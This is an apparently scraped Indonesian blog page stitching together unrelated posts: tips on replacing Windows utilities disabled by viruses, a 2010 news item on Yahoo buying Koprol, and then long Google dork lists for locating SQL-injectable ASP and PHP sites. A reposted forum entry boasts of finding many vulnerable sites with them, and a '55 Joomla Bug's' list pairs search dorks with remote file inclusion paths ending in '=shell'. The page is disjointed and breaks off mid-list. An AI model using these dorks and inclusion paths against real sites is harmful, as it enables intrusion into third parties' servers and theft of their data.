2. RegAlyzer sebagai pengganti Registry Editor (regedit.exe)

Tanpa kemampuan untuk mengakses registry Windows, kita tidak bisa secar manual membuat perubahan sama sekali, tidak bisa mengimpor file registry (REG files). Ketika virus telah mendisable regedit kita dapat menemukan sebuah pesan ““Registry editing has been disabled by your administrator”, ketika kita menjalankannya. Alternatif yang bagus adalah dengan menggunakan RegAlyzer, dikembangkan oleh Spybot. RegAlyzer membutuhkan isntalasi, tapi kita bisa copy semua folder yang talh jadi ke usb drive dan menjalakannya secara portable.


3. GS sebagai pengganti Command Prompt (cmd.exe)

Command prompt adalah tool yang powerful yang mendukung banyak perintah (commands) ketika kita menemukan sesuatu yang tidak bisa dilakukan di windows. Jika kita menjalankan command prompt dan mendapatkan pesan “The command prompt has been disabled by your administrator. Press any key to continue”, kita dapat menggunakan GS. GS adalah pengganti cmd, GS freeware dan portable.


4. Run Dialog Replacement 1.0 sebagai pengganti Kotak Dialog Run

Beberapa virus juga menghilangkan perintah run dari Start Menu dan tidaklah mudah untuk memunculkannya. Walaupun hal ini tidak begitu penting. Tapi Run memudahkan kita untuk melakukan perintah yang penting. Run Dialog Replacement V.1.0 cukup kecil, hanya berukuran 48 kb dan juga portable. Gunakan perintah Run dengan hanya menekan ctrl+R.


5. Autoruns sebagai penganti System Configuration Utility (msconfig.exe)

Msconfig adalah tempat pertam kali saya untuk melakukan pemeriksaan ketika komputer jika computer terinfeksi virus. Jika kita menjalankan msconfig dan klik tab startup, maka akan terlihat seluruh program yang akan berjalan ketika windows baru start. Para pembuat virus sangat awas mereka biasanya mendelete file original msconfig atu mengganti lokasi aslinya dari registry windows. Jika kita menemukan pesan “Windows cannot find ‘msconfig’. Make sure you typed the name correctly, and then try again. To search for a file, click the Start button, and then click Search.” ketika mengakses msconfig. Alternatid yan bagus untuk itu adalah tool Autoruns, satu publish dengan Process Explorer. Autoruns mempunyai banyak keterangan dari lokasi berjalannya suatu proses dari startup, menunjukkan program yang megnkonfigurasi ketika system booting dan login.


6. FreeCommander sebagai pengganti Folder Option

Saya telah banyak mencoba memanage file dan kebanyakan dari padanya merubah "show hidden files or hide protected opering system" dari setingannya pada windows. Jika virus tetap aktif di memory, maka masih bisa merubah setting untuk mendisable dari melihat file-file yang di sembunyikan (hidden) dan file system. FreeCommander adalah tool yang dapat melakukan aksi seperti folder option, tool ini portable. Kita dapat mengextract semua filenya ke usb drive.

Tool yang lain mempunyai fungsi yang hampir sama, dintaranya yaitu:

- autorun management application
- Proccess Master
- Sohand Removal tool
- Files And Folders Reset attrebiutes
Hebat Jejaring Sosial Made in Indonesia di Beli Yahoo

Hebat Jejaring Sosial Made in Indonesia di Beli Yahoo

9:30 PM Add Comment
JAKARTA - Siapa bilang aplikasi buatan asli Indonesia tidak bisa bersaing dengan produk buatan luar negeri, khususnya Amerika Serikat. Dan Koprol.com, sebuah layanan jejaring sosial asli Indonesia membuktikannya!

Layanan jejaring sosial berbasis Global Postioning System (GPS), mirip seperti Foursquare, secara resmi dibeli oleh Yahoo yang berbasis di negeri Paman Sam.

"Di masa depan orang akan semakin bergantung pada perangkat handset untuk berkomunikasi dan mengakses internet. Hal ini terjadi terutama terjadi di pasar negara berkembang di mana kami memperkenalkan Yahoo," kata Yvonne Chang, VP & Managing Director Yahoo Asia Tenggara, saat konferensi pers, di FX Cone, Jakarta, Selasa (25/5/2010).

Ditambahkan olehnya, Koprol memungkinkan orang untuk terhubung dan berbagi foto, serta berbagi ulasan dan informasi tambahan tentang lokasi secara real-time dengan hanya menggunakan browser di ponsel mereka.

"Koprol ini dirancang secara unik untuk ponsel dan dalam waktu setahun telah membangun basis pengguna yang kuat. Akuisisi Yahoo sebagai perusahan dan teknologi skala global, dapat mempercepat pertumbuhan di Indonesia serta memperkenalkan layanan untuk pasar-pasar baru lainnya," tambah Chang.

Untuk saat ini, aplikasi Koprol segera dapat diakses dalam halaman Yahoo mobile Indonesia. Tapi tidak menutup kemungkinan, Yahoo akan memperkenalkanya di halaman depan Yahoo Internasional.

Sayangnya, Chang enggan membeberkan lebih jauh berapa nilai akuisisi yang diberikan Koprol agar menjadi satu bagian dari perusahan Yahoo.

Asp Dork

8:52 PM Add Comment
".asp?bookID="
".asp?cart="
".asp?cartID="
".asp?catalogid="
".asp?category_list="
".asp?CategoryID="
".asp?catID="
".asp?cid="
".asp?code_no="
".asp?code="
".asp?designer="
".asp?framecode="
".asp?id="
".asp?idcategory="
".asp?idproduct="
".asp?intCatalogID="
".asp?intProdId="
".asp?item_id="
".asp?item="
".asp?itemID="
".asp?maingroup="
".asp?misc="
".asp?newsid="
".asp?order_id="
".asp?p="
".asp?pid="
".asp?ProdID="
".asp?product_id="
".asp?product="
".asp?productid="
".asp?showtopic="
".asp?Sku="
".asp?storeid="
".asp?style_id="
".asp?StyleID="
".asp?userID="
"about.asp?cartID="
"accinfo.asp?cartId="
"acclogin.asp?cartID="
"add.asp?bookid="
"add_cart.asp?num="
"addcart.asp?"
"addItem.asp"
"add-to-cart.asp?ID="
"addToCart.asp?idProduct="
"addtomylist.asp?ProdId="
"adminEditProductFields.asp?intProdID="
"advSearch_h.asp?idCategory="
"affiliate.asp?ID="
"affiliate-agreement.cfm?storeid="
"affiliates.asp?id="
"ancillary.asp?ID="
"archive.asp?id="
"article.asp?id="
"aspx?PageID"
"basket.asp?id="
"Book.asp?bookID="
"book_list.asp?bookid="
"book_view.asp?bookid="
"BookDetails.asp?ID="
"browse.asp?catid="
"browse_item_details.asp"
"Browse_Item_Details.asp?Store_Id="
"buy.asp?"
"buy.asp?bookid="
"bycategory.asp?id="
"cardinfo.asp?card="
"cart.asp?action="
"cart.asp?cart_id="
"cart.asp?id="
"cart_additem.asp?id="
"cart_validate.asp?id="
"cartadd.asp?id="
"cat.asp?iCat="
"catalog.asp"
"catalog.asp?CatalogID="
"catalog_item.asp?ID="
"catalog_main.asp?catid="
"category.asp"
"category.asp?catid="
"category_list.asp?id="
"categorydisplay.asp?catid="
"checkout.asp?cartid="
"checkout.asp?UserID="
"checkout_confirmed.asp?order_id="
"checkout1.asp?cartid="
"comersus_listCategoriesAndProducts.asp?idCategory ="
"comersus_optEmailToFriendForm.asp?idProduct="
"comersus_optReviewReadExec.asp?idProduct="
"comersus_viewItem.asp?idProduct="
"comments_form.asp?ID="
"contact.asp?cartId="
"content.asp?id="
"customerService.asp?TextID1="
"default.asp?catID="
"description.asp?bookid="
"details.asp?BookID="
"details.asp?Press_Release_ID="
"details.asp?Product_ID="
"details.asp?Service_ID="
"display_item.asp?id="
"displayproducts.asp"
"downloadTrial.asp?intProdID="
"emailproduct.asp?itemid="
"emailToFriend.asp?idProduct="
"events.asp?ID="
"faq.asp?cartID="
"faq_list.asp?id="
"faqs.asp?id="
"feedback.asp?title="
"freedownload.asp?bookid="
"fullDisplay.asp?item="
"getbook.asp?bookid="
"GetItems.asp?itemid="
"giftDetail.asp?id="
"help.asp?CartId="
"home.asp?id="
"index.asp?cart="
"index.asp?cartID="
"index.asp?ID="
"info.asp?ID="
"item.asp?eid="
"item.asp?item_id="
"item.asp?itemid="
"item.asp?model="
"item.asp?prodtype="
"item.asp?shopcd="
"item_details.asp?catid="
"item_list.asp?maingroup"
"item_show.asp?code_no="
"itemDesc.asp?CartId="
"itemdetail.asp?item="
"itemdetails.asp?catalogid="
"learnmore.asp?cartID="
"links.asp?catid="
"list.asp?bookid="
"List.asp?CatID="
"listcategoriesandproducts.asp?idCategory="
"modline.asp?id="
"myaccount.asp?catid="
"news.asp?id="
"order.asp?BookID="
"order.asp?id="
"order.asp?item_ID="
"OrderForm.asp?Cart="
"page.asp?PartID="
"payment.asp?CartID="
"pdetail.asp?item_id="
"powersearch.asp?CartId="
"price.asp"
"privacy.asp?cartID="
"prodbycat.asp?intCatalogID="
"prodetails.asp?prodid="
"prodlist.asp?catid="
"product.asp?bookID="
"product.asp?intProdID="
"product_info.asp?item_id="
"productDetails.asp?idProduct="
"productDisplay.asp"
"productinfo.asp?item="
"productlist.asp?ViewType=Category&CategoryID= "
"productpage.asp"
"products.asp?ID="
"products.asp?keyword="
"products_category.asp?CategoryID="
"products_detail.asp?CategoryID="
"productsByCategory.asp?intCatalogID="
"prodView.asp?idProduct="
"promo.asp?id="
"promotion.asp?catid="
"pview.asp?Item="
"resellers.asp?idCategory="
"results.asp?cat="
"savecart.asp?CartId="
"search.asp?CartID="
"searchcat.asp?search_id="
"Select_Item.asp?id="
"Services.asp?ID="
"shippinginfo.asp?CartId="
"shop.asp?a="
"shop.asp?action="
"shop.asp?bookid="
"shop.asp?cartID="
"shop_details.asp?prodid="
"shopaddtocart.asp"
"shopaddtocart.asp?catalogid="
"shopbasket.asp?bookid="
"shopbycategory.asp?catid="
"shopcart.asp?title="
"shopcreatorder.asp"
"shopcurrency.asp?cid="
"shopdc.asp?bookid="
"shopdisplaycategories.asp"
"shopdisplayproduct.asp?catalogid="
"shopdisplayproducts.asp"
"shopexd.asp"
"shopexd.asp?catalogid="
"shopping_basket.asp?cartID="
"shopprojectlogin.asp"
"shopquery.asp?catalogid="
"shopremoveitem.asp?cartid="
"shopreviewadd.asp?id="
"shopreviewlist.asp?id="
"ShopSearch.asp?CategoryID="
"shoptellafriend.asp?id="
"shopthanks.asp"
"shopwelcome.asp?title="
"show_item.asp?id="
"show_item_details.asp?item_id="
"showbook.asp?bookid="
"showStore.asp?catID="
"shprodde.asp?SKU="
"specials.asp?id="
"store.asp?id="
"store_bycat.asp?id="
"store_listing.asp?id="
"Store_ViewProducts.asp?Cat="
"store-details.asp?id="
"storefront.asp?id="
"storefronts.asp?title="
"storeitem.asp?item="
"StoreRedirect.asp?ID="
"subcategories.asp?id="
"tek9.asp?"
"template.asp?Action=Item&pid="
"topic.asp?ID="
"tuangou.asp?bookid="
"type.asp?iType="
"updatebasket.asp?bookid="
"updates.asp?ID="
"view.asp?cid="
"view_cart.asp?title="
"view_detail.asp?ID="
"viewcart.asp?CartId="
"viewCart.asp?userID="
"viewCat_h.asp?idCategory="
"viewevent.asp?EventID="
"viewitem.asp?recor="
"viewPrd.asp?idcategory="
"ViewProduct.asp?misc="
"voteList.asp?item_ID="
"whatsnew.asp?idCategory="
"WsAncillary.asp?ID="
"WsPages.asp?ID
Dork Google Hacking

Dork Google Hacking

3:02 AM Add Comment

 Code:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:Play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:Page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:Product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:Preview.php?id=
inurl:loadpsb.php?id=
inurl:Opinions.php?id=
inurl:spr.php?id=
inurl:Pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:Participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:Prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:Person.php?id=
inurl:Productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:Profile_view.php?id=
inurl:category.php?id=
inurl:Publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:Prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:Product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:Produit.php?id=
inurl:Pop.php?id=
inurl:shopping.php?id=
inurl:Productdetail.php?id=
inurl:Post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:Page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:Product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:Product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:Opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:Offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=






trainers.php?id=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: preg_match()
"id=" & intext:"Warning: ilesize()
"id=" & intext:"Warning: filesize()
index.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
newsitem.php?num=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
announce.php?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
index.php?=
profile_view.php?id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
readnews.php?id=
newsone.php?id=
product-item.php?id=
pages.php?id=
clanek.php4?id=
viewapp.php?id=
viewphoto.php?id=
galeri_info.php?l=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
story.php?id=
look.php?ID=
aboutbook.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: is_writable()
"id=" & intext:"Warning: Unknown()
"id=" & intext:"Warning: mysql_result()
"id=" & intext:"Warning: pg_exec()
"id=" & intext:"Warning: require()
buy.php?category=
pageid=
page.php?file=
show.php?id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
select_biblio.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
loadpsb.php?id=
announce.php?id=
participant.php?id=
download.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
index.php?=
profile_view.php?id=
category.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
tradeCategory.php?id=
transcript.php?id=
item_id=
news-full.php?id=
aboutbook.php?id=
preview.php?id=
material.php?id=
read.php?id=
viewapp.php?id=
story.php?id=
newsone.php?id=
rubp.php?idr=
art.php?idm=
title.php?id=
index1.php?modo=
include.php?*[*]*=
nota.php?pollname=
index3.php?p=
padrao.php?pre=
home.php?pa=
main.php?type=
sitio.php?start=
*.php?include=
general.php?xlink=
show.php?go=
nota.php?ki=
down*.php?oldal=
layout.php?disp=
enter.php?chapter=
base.php?incl=
enter.php?mod=
show.php?corpo=
head.php?*[*]*=
info.php?strona=
template.php?str=
main.php?doshow=
view.php?*[*]*=
index.php?to=
page.php?cmd=
view.php?b=
info.php?option=
show.php?x=
template.php?texto=
index3.php?ir=
print.php?chapter=
file.php?inc=
file.php?cont=
view.php?cmd=
include.php?chapter=
path.php?my=
principal.php?param=
general.php?menue=
index1.php?b=
info.php?chapter=
nota.php?chapter=
general.php?include=
start.php?addr=
index1.php?qry=
index1.php?loc=
page.php?addr=
index1.php?dir=
principal.php?pr=
press.php?seite=
head.php?cmd=
home.php?sec=
home.php?category=
standard.php?cmd=
mod*.php?thispage=
base.php?to=
view.php?choix=
base.php?panel=
template.php?mod=
info.php?j=
blank.php?pref=
sub*.php?channel=
standard.php?in=
general.php?cmd=
pagina.php?panel=
template.php?where=
path.php?channel=
gery.php?seccion=
page.php?tipo=
sitio.php?rub=
pagina.php?u=
file.php?ir=
*inc*.php?sivu=
path.php?start=
page.php?chapter=
home.php?recipe=
enter.php?pname=
layout.php?path=
print.php?open=
mod*.php?channel=
down*.php?phpbb_root_path=
*inc*.php?str=
gery.php?phpbb_root_path=
include.php?middlePart=
sub*.php?destino=
info.php?read=
home.php?sp=
main.php?strona=
sitio.php?get=
sitio.php?index=
index3.php?option=
enter.php?a=
main.php?second=
print.php?pname=
blank.php?itemnav=
blank.php?pagina=
index1.php?d=
down*.php?where=
*inc*.php?include=
path.php?pre=
home.php?loader=
start.php?eval=
index.php?disp=
head.php?mod=
sitio.php?section=
nota.php?doshow=
home.php?seite=
home.php?a=
page.php?url=
pagina.php?left=
layout.php?c=
principal.php?goto=
standard.php?base_dir=
home.php?where=
page.php?sivu=
*inc*.php?adresa=
padrao.php?str=
include.php?my=
show.php?home=
index.php?load=
index3.php?rub=
sub*.php?str=
start.php?index=
nota.php?mod=
sub*.php?mid=
index1.php?*[*]*=
pagina.php?oldal=
padrao.php?loc=
padrao.php?rub=
page.php?incl=
gery.php?disp=
nota.php?oldal=
include.php?u=
principal.php?pagina=
print.php?choix=
head.php?filepath=
include.php?corpo=
sub*.php?action=
head.php?pname=
press.php?dir=
show.php?xlink=
file.php?left=
nota.php?destino=
general.php?module=
index3.php?redirect=
down*.php?param=
default.php?ki=
padrao.php?h=
padrao.php?read=
mod*.php?cont=
index1.php?l=
down*.php?pr=
gery.php?viewpage=
template.php?load=
nota.php?pr=
padrao.php?destino=
index2.php?channel=
principal.php?opcion=
start.php?str=
press.php?*[*]*=
index.php?ev=
pagina.php?pre=
nota.php?content=
include.php?adresa=
sitio.php?t=
index.php?sivu=
principal.php?q=
path.php?ev=
print.php?module=
index.php?loc=
nota.php?basepath=
padrao.php?tipo=
index2.php?in=
principal.php?eval=
file.php?qry=
info.php?t=
enter.php?play=
general.php?var=
principal.php?s=
standard.php?pagina=
standard.php?subject=
base.php?second=
head.php?inc=
pagina.php?basepath=
main.php?pname=
*inc*.php?modo=
include.php?goto=
file.php?pg=
head.php?g=
general.php?header=
start.php?*root*=
enter.php?pref=
index3.php?open=
start.php?module=
main.php?load=
enter.php?pg=
padrao.php?redirect=
pagina.php?my=
gery.php?pre=
enter.php?w=
info.php?texto=
enter.php?open=
base.php?rub=
gery.php?*[*]*=
include.php?cmd=
standard.php?dir=
layout.php?page=
index3.php?pageweb=
include.php?numero=
path.php?destino=
index3.php?home=
default.php?seite=
path.php?eval=
base.php?choix=
template.php?cont=
info.php?pagina=
default.php?x=
default.php?option=
gery.php?ki=
down*.php?second=
blank.php?path=
pagina.php?v=
file.php?p




This is my first post, I hope it will be usefull...
I've found lots of vunerable sites with this list...
I want to share my dork list with HF.....

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
........................................................................

55 Joomla Bug's

2:59 AM 1 Comment


inurl:"com_admin"
/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell

inurl:index.php?option=com_simpleboard
/components/com_simpleboard/file_upload.php?sbp=shell

inurl:"com_hashcash"
/components/com_hashcash/server.php?mosConfig_absolute_path=shell

inurl:"com_htmlarea3_xtd-c"
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell

inurl:"com_sitemap"
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell

inurl:"com_performs"
/components/com_performs/performs.php?mosConfig_absolute_path=shell

inurl:"com_forum"
/components/com_forum/download.php?phpbb_root_path=

inurl:"com_pccookbook"
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell

inurl:index.php?option=com_extcalendar
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell

inurl:"minibb"
/components/minibb/index.php?absolute_path=shell

inurl:"com_smf"
/components/com_smf/smf.php?mosConfig_absolute_path=
/modules/mod_calendar.php?absolute_path=shell

inurl:"com_pollxt"
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell

inurl:"com_loudmounth"
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell

inurl:"com_videodb"
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shel l

inurl:index.php?option=com_pcchess
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell

inurl:"com_multibanners"
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=sh ell

inurl:"com_a6mambohelpdesk"
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shel l

inurl:"com_colophon"
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell

inurl:"com_mgm"
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell

inurl:"com_mambatstaff"
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell

inurl:"com_securityimages"
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell
/components/com_securityimages/lang.php?mosConfig_absolute_path=shell

inurl:"com_artlinks"
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell

inurl:"com_galleria"
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell

inurl:"com_akocomment"
/akocomments.php?mosConfig_absolute_path=shell

inurl:"com_cropimage"
